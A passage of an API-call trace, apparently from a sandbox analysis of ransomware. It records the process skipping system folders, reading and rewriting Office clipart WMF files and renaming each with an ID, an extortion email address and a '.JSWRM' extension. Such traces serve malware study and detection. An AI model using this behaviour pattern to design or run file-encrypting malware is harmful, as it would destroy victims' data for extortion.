lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0077.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0077.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00306_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00306_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00306_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0077.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0077.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0077.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0077.159] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00306_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.159] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=46814) returned 1 [0077.160] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb6d0) returned 0x24d210 [0077.160] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xb6d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xb6d0, lpOverlapped=0x0) returned 1 [0077.164] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.164] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xb6d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xb6d0, lpOverlapped=0x0) returned 1 [0077.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0077.165] CloseHandle (hObject=0x314) returned 1 [0077.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0077.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0077.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0077.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0077.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0077.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0077.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0077.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0077.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0077.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0077.166] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00306_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00306_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0077.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0077.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0077.166] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc2f4b6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc2f4b6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc55757, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17b4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00336_.WMF", cAlternateFileName="")) returned 1 [0077.166] lstrcmpiW (lpString1="FD00336_.WMF", lpString2=".") returned 1 [0077.166] lstrcmpiW (lpString1="FD00336_.WMF", lpString2="..") returned 1 [0077.166] lstrcmpiW (lpString1="FD00336_.WMF", lpString2="...") returned 1 [0077.166] lstrcmpiW (lpString1="FD00336_.WMF", lpString2="windows") returned -1 [0077.166] lstrcmpiW (lpString1="FD00336_.WMF", lpString2="recovery") returned -1 [0077.166] lstrcmpiW (lpString1="FD00336_.WMF", lpString2="perflogs") returned -1 [0077.166] lstrcmpiW (lpString1="FD00336_.WMF", lpString2="documents and settings") returned 1 [0077.166] lstrcmpiW (lpString1="FD00336_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.166] lstrcmpiW (lpString1="FD00336_.WMF", lpString2="system volume information") returned -1 [0077.166] lstrcmpiW (lpString1="FD00336_.WMF", lpString2="msocache") returned -1 [0077.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0077.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00336_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00336_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00336_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0077.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0077.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00336_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00336_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00336_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0077.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0077.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0077.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0077.167] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00336_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.168] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6068) returned 1 [0077.168] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17b0) returned 0x205850 [0077.168] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x17b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x17b0, lpOverlapped=0x0) returned 1 [0077.396] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.396] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x17b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x17b0, lpOverlapped=0x0) returned 1 [0077.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0077.396] CloseHandle (hObject=0x314) returned 1 [0077.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0077.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0077.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0077.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0077.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0077.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0077.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0077.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0077.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0077.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0077.397] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00336_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00336_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0077.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0077.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0077.398] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc2f4b6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfea, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00361_.WMF", cAlternateFileName="")) returned 1 [0077.398] lstrcmpiW (lpString1="FD00361_.WMF", lpString2=".") returned 1 [0077.398] lstrcmpiW (lpString1="FD00361_.WMF", lpString2="..") returned 1 [0077.398] lstrcmpiW (lpString1="FD00361_.WMF", lpString2="...") returned 1 [0077.398] lstrcmpiW (lpString1="FD00361_.WMF", lpString2="windows") returned -1 [0077.398] lstrcmpiW (lpString1="FD00361_.WMF", lpString2="recovery") returned -1 [0077.398] lstrcmpiW (lpString1="FD00361_.WMF", lpString2="perflogs") returned -1 [0077.398] lstrcmpiW (lpString1="FD00361_.WMF", lpString2="documents and settings") returned 1 [0077.398] lstrcmpiW (lpString1="FD00361_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.398] lstrcmpiW (lpString1="FD00361_.WMF", lpString2="system volume information") returned -1 [0077.398] lstrcmpiW (lpString1="FD00361_.WMF", lpString2="msocache") returned -1 [0077.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0077.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00361_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00361_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00361_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0077.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0077.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00361_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00361_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00361_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0077.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0077.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0077.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0077.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00361_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.399] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4074) returned 1 [0077.399] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xfe0) returned 0x23fc98 [0077.399] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xfe0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xfe0, lpOverlapped=0x0) returned 1 [0077.402] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.402] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xfe0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xfe0, lpOverlapped=0x0) returned 1 [0077.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0077.402] CloseHandle (hObject=0x314) returned 1 [0077.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0077.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0077.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0077.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0077.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0077.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0077.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0077.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0077.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0077.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0077.403] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00361_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00361_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0077.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0077.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0077.403] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc2f4b6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc2f4b6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc55757, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2168, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00369_.WMF", cAlternateFileName="")) returned 1 [0077.404] lstrcmpiW (lpString1="FD00369_.WMF", lpString2=".") returned 1 [0077.404] lstrcmpiW (lpString1="FD00369_.WMF", lpString2="..") returned 1 [0077.404] lstrcmpiW (lpString1="FD00369_.WMF", lpString2="...") returned 1 [0077.404] lstrcmpiW (lpString1="FD00369_.WMF", lpString2="windows") returned -1 [0077.404] lstrcmpiW (lpString1="FD00369_.WMF", lpString2="recovery") returned -1 [0077.404] lstrcmpiW (lpString1="FD00369_.WMF", lpString2="perflogs") returned -1 [0077.404] lstrcmpiW (lpString1="FD00369_.WMF", lpString2="documents and settings") returned 1 [0077.404] lstrcmpiW (lpString1="FD00369_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.404] lstrcmpiW (lpString1="FD00369_.WMF", lpString2="system volume information") returned -1 [0077.404] lstrcmpiW (lpString1="FD00369_.WMF", lpString2="msocache") returned -1 [0077.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0077.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00369_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00369_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00369_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0077.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0077.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00369_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00369_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00369_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0077.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0077.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0077.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0077.404] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00369_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.405] 